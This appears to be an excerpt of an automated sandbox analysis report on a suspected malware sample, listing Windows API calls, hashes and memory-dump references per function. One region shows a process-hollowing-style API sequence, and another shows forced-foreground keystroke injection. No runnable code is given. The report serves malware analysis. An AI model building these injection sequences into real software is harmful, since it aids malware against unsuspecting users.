                                                              • Opcode Fuzzy Hash: 358366c1e69463fe1662d80f2fc9dc35bffb28a79a0fe7d5316b23b0aa3074f9
                                                              • Instruction Fuzzy Hash: 3EF0C87210421D6BDB04BF98EE11EDE77ED9F00354F70446AFA05E2281DBB1D64097A5
                                                              APIs
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              • __lock_file.LIBCMT ref: 00AD3629
                                                                • Part of subcall function 00AD4E1C: __lock.LIBCMT ref: 00AD4E3F
                                                              • __fclose_nolock.LIBCMT ref: 00AD3634
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 2800547568-0
                                                              • Opcode ID: 04a012d5f4d45c2b29894b6cd55285ad89340faa419e81de9abffae83781de4f
                                                              • Instruction ID: 49b757086d389b8d5cd1cca06260e4dfd0df1526fae8b26b78263fb4d690da0e
                                                              • Opcode Fuzzy Hash: 04a012d5f4d45c2b29894b6cd55285ad89340faa419e81de9abffae83781de4f
                                                              • Instruction Fuzzy Hash: E0F09072801204AADB116B65890276FBBA06F41730F25815BE423AB3D1CB7CCA019A96
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00E86C4B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E86CE1
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E86D03
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303683207.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e85000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                              • Instruction ID: d1f76279e7afd887df86a38ba483954784b378a3e9e28f69cbd1e1008675db37
                                                              • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                              • Instruction Fuzzy Hash: 0F12C024E14658C6EB24DF64D8507DEB232EF68300F1064E9910DEB7A5E77A4F81CF5A
                                                              APIs
                                                              • __flush.LIBCMT ref: 00AD2A0B
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __flush__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 4101623367-0
                                                              • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                              • Instruction ID: 782dc2ae5ae75557d7f941eba3e7a06d7679c098790fa0a1fa004a80a8761394
                                                              • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                              • Instruction Fuzzy Hash: A841A4706007069FDB288F69C9906AEB7B6EF643A0B24852FE857C7350EB70DD40CB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: c68f378df8dee10d699f5b60d69ee54eca54da2ce819daafc6db4d21d2859d19
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: 4531C775A00105DBDB1ADF58C480A69FBB6FF49340B6686A9E40ACB256DB31EDC1CB90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: bb078f6b3ccc7a05a921a6cf699553db54adf086d39d0e28fd346298c3f3c248
                                                              • Instruction ID: 7a916ac049a82d9a4f348744bdb1463938163b5290e240a4780b0f850c83a1ad
                                                              • Opcode Fuzzy Hash: bb078f6b3ccc7a05a921a6cf699553db54adf086d39d0e28fd346298c3f3c248
                                                              • Instruction Fuzzy Hash: F9319E75204528DFCB01AF10D1D0BAE7BB1FF58320F61848AEA951B386DBB4A985CF81
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: b77116e216c21c67f79c1bcc7e66980ca1b7dc3fb967742f7a860755b4ef5b74
                                                              • Instruction ID: af1b93baaa59d34dd6674b2ada873af5d6233197a0cc629cad69d44d3eaccd64
                                                              • Opcode Fuzzy Hash: b77116e216c21c67f79c1bcc7e66980ca1b7dc3fb967742f7a860755b4ef5b74
                                                              • Instruction Fuzzy Hash: E3413870608655CFDB24DF18C484F1ABBF1AF45304F1A89ACE99A4B362C772E845CF52
                                                              APIs
                                                                • Part of subcall function 00AB4214: FreeLibrary.KERNEL32(00000000,?), ref: 00AB4247
                                                              • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00AB39FE,?,00000001), ref: 00AB41DB
                                                                • Part of subcall function 00AB4291: FreeLibrary.KERNEL32(00000000), ref: 00AB42C4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load
                                                              • String ID:
                                                              • API String ID: 2391024519-0
                                                              • Opcode ID: 27f5ab7cf0c41360f75700fc8ae6e604dde9b96cf7357b66449772effe774cae
                                                              • Instruction ID: 8d52e72fe6b535cb05b10af23970903088075f902495086bec3e90117c7a8d0b
                                                              • Opcode Fuzzy Hash: 27f5ab7cf0c41360f75700fc8ae6e604dde9b96cf7357b66449772effe774cae
                                                              • Instruction Fuzzy Hash: E1119131610316BADB14AB74DE06BEE77ED9F44700F108429B596AA183EB74DA04AB61
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: 62764ef042fd9d3d77a6f6e09e6f145306d299ae052d2c9dad32d86cf49cf99a
                                                              • Instruction ID: 1dbfbf047f7d401e22fd306aa3bd543cde1cc70c3d283d872541f196123f9357
                                                              • Opcode Fuzzy Hash: 62764ef042fd9d3d77a6f6e09e6f145306d299ae052d2c9dad32d86cf49cf99a
                                                              • Instruction Fuzzy Hash: FA212570608605CFDB24DF68C544F1ABBF1BF84304F1689ACEA9A4B222C732E845CF52
                                                              APIs
                                                              • ___lock_fhandle.LIBCMT ref: 00ADAFC0
                                                                • Part of subcall function 00AD7BDA: __getptd_noexit.LIBCMT ref: 00AD7BDA
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$___lock_fhandle
                                                              • String ID:
                                                              • API String ID: 1144279405-0
                                                              • Opcode ID: c1c26ea70c34ff6b77c1d03b22ccc18363ad2d7c74378bddc9ad402417018e29
                                                              • Instruction ID: 6ee3c73922338825862511abd76baa06f87545bf226f14302a73432057c0fe2e
                                                              • Opcode Fuzzy Hash: c1c26ea70c34ff6b77c1d03b22ccc18363ad2d7c74378bddc9ad402417018e29
                                                              • Instruction Fuzzy Hash: 75119D728246009FD7167FA88A0276E3A60AF41331F164283E4374F3E2DBB989408BB1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                              • Instruction ID: 619ef35abbd8126dbfa87c9e614d01f0fb4a4627f91c9eb26a5f239da6f4678b
                                                              • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                              • Instruction Fuzzy Hash: FF01493150010DBFCF05EFA4C9918FEBB78EF14344F108169B56697197EA319A49DF60
                                                              APIs
                                                              • __lock_file.LIBCMT ref: 00AD2AED
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 2597487223-0
                                                              • Opcode ID: 0059413129f7ebf8cbcf8e15d4cb65d05cf24a0d298b265a56f3dbc36a6a93d7
                                                              • Instruction ID: 44c1b7f30c384026ede7a352b4b55aa6fc0f2a29133e98a94ac9571f95fb1fc6
                                                              • Opcode Fuzzy Hash: 0059413129f7ebf8cbcf8e15d4cb65d05cf24a0d298b265a56f3dbc36a6a93d7
                                                              • Instruction Fuzzy Hash: 68F09035A00205EBEF21AF748E067DF3BA5BF10360F158417F4169B3A1DBB88A52DB51
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,00AB39FE,?,00000001), ref: 00AB4286
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: c064453ef0574752fedac1973b106a277ce8df65c94e1c40a1b158e90f820221
                                                              • Instruction ID: 2babddca3b1dd1bca35ec6358ba49f815df941e4546b08e673430bd058029937
                                                              • Opcode Fuzzy Hash: c064453ef0574752fedac1973b106a277ce8df65c94e1c40a1b158e90f820221
                                                              • Instruction Fuzzy Hash: F5F039B1505702CFCB349F64E890896BBF8BF183253248A3EF1D682613C772A840EF50
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AB40C6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID:
                                                              • API String ID: 82841172-0
                                                              • Opcode ID: 4f9d8ed6fecbfec129a882cbf24f7ec255f962ac943deb1a713ee5b41143858d
                                                              • Instruction ID: 0d7b8381121ba95a4b6683cc8eb1c35f8264abb15b81447df878cbd7ca53f21a
                                                              • Opcode Fuzzy Hash: 4f9d8ed6fecbfec129a882cbf24f7ec255f962ac943deb1a713ee5b41143858d
                                                              • Instruction Fuzzy Hash: E9E0C2366002245BCB11A658DC46FEF77ADDF886A0F0901B6F90AE7244DEA4AE819690
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 00E874A1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303683207.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e85000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                              • Instruction ID: a7c29b395fda24089b03446b995aa55a031b6c6432f56b5f4b1ef1809872210b
                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                              • Instruction Fuzzy Hash: 9AE09A7494410DAFDB00EFA4D94969E7FB4EF04301F1045A5FD05E6680DA309E548A62
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 00E874A1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303683207.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e85000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction ID: f1ba49cf32f7ec9c6254073ae036b9abef1569c8d0e3b14309cb907c753b94ac
                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction Fuzzy Hash: A3E0E67494410DDFDB00EFF4D94969E7FB4EF04301F104565FD05E2280D6309D508A72
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00B1F87D
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B1F8DC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00B1F919
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B1F940
                                                              • SendMessageW.USER32 ref: 00B1F966
                                                              • _wcsncpy.LIBCMT ref: 00B1F9D2
                                                              • GetKeyState.USER32(00000011), ref: 00B1F9F3
                                                              • GetKeyState.USER32(00000009), ref: 00B1FA00
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B1FA16
                                                              • GetKeyState.USER32(00000010), ref: 00B1FA20
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B1FA4F
                                                              • SendMessageW.USER32 ref: 00B1FA72
                                                              • SendMessageW.USER32(?,00001030,?,00B1E059), ref: 00B1FB6F
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00B1FB85
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B1FB96
                                                              • SetCapture.USER32(?), ref: 00B1FB9F
                                                              • ClientToScreen.USER32(?,?), ref: 00B1FC03
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B1FC0F
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00B1FC29
                                                              • ReleaseCapture.USER32 ref: 00B1FC34
                                                              • GetCursorPos.USER32(?), ref: 00B1FC69
                                                              • ScreenToClient.USER32(?,?), ref: 00B1FC76
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B1FCD8
                                                              • SendMessageW.USER32 ref: 00B1FD02
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B1FD41
                                                              • SendMessageW.USER32 ref: 00B1FD6C
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B1FD84
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B1FD8F
                                                              • GetCursorPos.USER32(?), ref: 00B1FDB0
                                                              • ScreenToClient.USER32(?,?), ref: 00B1FDBD
                                                              • GetParent.USER32(?), ref: 00B1FDD9
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B1FE3F
                                                              • SendMessageW.USER32 ref: 00B1FE6F
                                                              • ClientToScreen.USER32(?,?), ref: 00B1FEC5
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B1FEF1
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B1FF19
                                                              • SendMessageW.USER32 ref: 00B1FF3C
                                                              • ClientToScreen.USER32(?,?), ref: 00B1FF86
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B1FFB6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00B2004B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                              • String ID: @GUI_DRAGID$F
                                                              • API String ID: 2516578528-4164748364
                                                              • Opcode ID: 1958a581b6a2ade02b81c3593ef2c1dffd2860cec3a8b75bb9fea964a479356a
                                                              • Instruction ID: 7505158b5f1ca915ddb21fed0cb0c87c048f848a462fbe76354c2cdee719426e
                                                              • Opcode Fuzzy Hash: 1958a581b6a2ade02b81c3593ef2c1dffd2860cec3a8b75bb9fea964a479356a
                                                              • Instruction Fuzzy Hash: C032CE74604246EFDB10CF28C884BBABBE8FF49354F540AA9F659872A1CB31DD91CB51
                                                              APIs
                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00B1B1CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: %d/%02d/%02d
                                                              • API String ID: 3850602802-328681919
                                                              • Opcode ID: d8e2f89a749c99413e7bd78ef99d7e152262878c9ba5bff743f0d8050470af28
                                                              • Instruction ID: 04a9e8e38c50d91f6c45a260f748cb232a1dbe1ee84b80ae691d9d46b1c6403b
                                                              • Opcode Fuzzy Hash: d8e2f89a749c99413e7bd78ef99d7e152262878c9ba5bff743f0d8050470af28
                                                              • Instruction Fuzzy Hash: 8B12BD71500208ABEB248F64DD89FEE7BF8EF45710F6041A9F919EB2D1DB709981CB51
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 00ACEB4A
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B23AEA
                                                              • IsIconic.USER32(000000FF), ref: 00B23AF3
                                                              • ShowWindow.USER32(000000FF,00000009), ref: 00B23B00
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00B23B0A
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B23B20
                                                              • GetCurrentThreadId.KERNEL32 ref: 00B23B27
                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00B23B33
                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B23B44
                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B23B4C
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B23B54
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00B23B57
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B23B6C
                                                              • keybd_event.USER32(00000012,00000000), ref: 00B23B77
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B23B81
                                                              • keybd_event.USER32(00000012,00000000), ref: 00B23B86
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B23B8F
                                                              • keybd_event.USER32(00000012,00000000), ref: 00B23B94
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B23B9E
                                                              • keybd_event.USER32(00000012,00000000), ref: 00B23BA3
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00B23BA6
                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00B23BCD
                                                              Strings
                                                              Memory Dump Source
